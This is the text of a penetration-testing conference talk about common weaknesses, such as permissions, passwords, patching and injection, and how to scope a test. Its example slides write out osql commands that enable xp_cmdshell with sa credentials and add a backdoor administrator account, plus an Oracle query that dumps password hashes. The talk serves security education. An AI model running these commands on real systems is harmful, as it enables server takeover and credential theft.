530 likes | 726 Views
The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller. AGENDA. Pen Testing vs. VA vs. Risk Assessments Penetration Testing Concepts/Issues What is Low Hanging Fruit Low Hanging Fruit Examples Wrap Up. B.S. I.S., M.S. C.S. – Virginia Commonwealth University
E N D
The Low Hanging Fruit of Penetration Testing Presented by: Bryan Miller
AGENDA • Pen Testing vs. VA vs. Risk Assessments • Penetration Testing Concepts/Issues • What is Low Hanging Fruit • Low Hanging Fruit Examples • Wrap Up The Low Hanging Fruit of Penetration Testing
B.S. I.S., M.S. C.S. – Virginia Commonwealth University • Current CISSP, former Banyan CBE & Cisco CCIE • Former adjunct professor – I.S. & C.S. – VCU • ISSA, ISACA, IALR and VA SCAN lecturer • Penetration testing for 11+ years • Published author with 25 years in I.T. The Low Hanging Fruit of Penetration Testing
Penetration Testing vs. Vulnerability Assessments vs. Risk Assessments The Low Hanging Fruit of Penetration Testing
Penetration Testing • Tests for actual vulnerabilities and what can be exploited • Value add comes from putting the pieces together • Vulnerability Assessment • Reports on potential vulnerabilities without testing them • Assigns risk values to each issue • Risk Assessment • More analytical and less technical • Great for overviews but IMHO it will never catch LHF The Low Hanging Fruit of Penetration Testing
Penetration Testing Concepts/Issues The Low Hanging Fruit of Penetration Testing
Types of testing • External • Testing from outside the security perimeter (firewall) • Internet, dial-in, wireless, physical & social engineering • Usually performed in a black-box approach w/no credentials The Low Hanging Fruit of Penetration Testing
Types of testing • Internal • What is accessible inside the security perimeter • White-box or black-box depending on goals • Tests for effects of automated malicious software The Low Hanging Fruit of Penetration Testing
Issues - Requirements definition • Do you need a penetration test, VA or risk assessment? • Sometimes you may need more than one • What is the ultimate goal of the test? • Physical → Test security cameras, locks and alarms • Social Engineering → Test HR policies and procedures • Vulnerability Assessment → Patch scan • How do you define success? • How do you know if the test succeeded or failed? • Sometimes difficult to define for a penetration test The Low Hanging Fruit of Penetration Testing
Issues - In-house or outsourced? • In-house • Keeping qualified staff happy is a tough job • Tools and training can be very expensive • Sometimes you just need an unbiased 2nd opinion • Outsourced • How do you judge competency? • Do they have a methodology, tool list, references? • Do they outsource their work? • Geography/vertical market coverage The Low Hanging Fruit of Penetration Testing
Issues • Deliverables • Will the report include specific recommendations? • Is there tool output for verification? • No boilerplate text! • Remediation • If you don’t plan on fixing the issues, don’t waste the time or money performing the tests • Post-remediation testing • Critical to ensure that all issues have been resolved The Low Hanging Fruit of Penetration Testing
What is Low Hanging Fruit? The Low Hanging Fruit of Penetration Testing
The Low Hanging Fruit Top Ten • Permissions on data resources • Employee security awareness • Encryption • Policies & procedures • Physical security The Low Hanging Fruit of Penetration Testing
The Low Hanging Fruit Top Ten • Password management • Default security controls • OS and application patches • SQL Injection, XSS, URL issues • Wireless access points/modems The Low Hanging Fruit of Penetration Testing
Low Hanging Fruit Examples The Low Hanging Fruit of Penetration Testing
Fun with Microsoft SQL • Turn on “xp_cmdshell” if it’s disabled • osql –S10.1.1.1 -U sa -P pwd -Q"EXECUTE master.dbo.sp_configure 'show advanced options', 1" • osql –S10.1.1.1 -U sa -P pwd -Q"RECONFIGURE" • osql –S10.1.1.1 -U sa -P pwd -Q"EXECUTE master.dbo.sp_configure ‘xp_cmdshell’, 1" • osql –S10.1.1.1 -U sa -P pwd -Q"RECONFIGURE" The Low Hanging Fruit of Penetration Testing
More Fun with Microsoft SQL • Add administrative user • osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE xp_cmdshell 'net user bmiller passwd /add'" • osql -S10.1.1.1 -U sa -P pwd -Q"EXECUTE xp_cmdshell 'net localgroup administrators bmiller /add'" The Low Hanging Fruit of Penetration Testing
The Trouble with VNC The Low Hanging Fruit of Penetration Testing
There are many ways to get the VNC password hashes… The Low Hanging Fruit of Penetration Testing
Fun with Oracle • Dumping password hashes – non-privileged account • Logged in as “dbsnmp”, we ran the following query: • select username, password from dba_users; • DBSNMP AE1E40C725DFCAC8 • AQADMIN 739EF27E22AC39DC • SYS C10A280B9CFF9A72 • SYSTEM 04D19DEFD642AF20 The Low Hanging Fruit of Penetration Testing
Ran CheckPWD: The Low Hanging Fruit of Penetration Testing
Reboot via Compaq Insight Manager (CIM) The Low Hanging Fruit of Penetration Testing
Appliances are not immune…. The Low Hanging Fruit of Penetration Testing
Downloaded passwd, shadow, host files The Low Hanging Fruit of Penetration Testing
Looks like we can request any file? The Low Hanging Fruit of Penetration Testing
OK, we’ll ask for the passwordfile. Next up, JTR! The Low Hanging Fruit of Penetration Testing
This is why PCI doesn’t allow WEP The Low Hanging Fruit of Penetration Testing
What the fake telephone repairman saw… The Low Hanging Fruit of Penetration Testing
The danger of scripts laying around… The Low Hanging Fruit of Penetration Testing
Wrap-Up The Low Hanging Fruit of Penetration Testing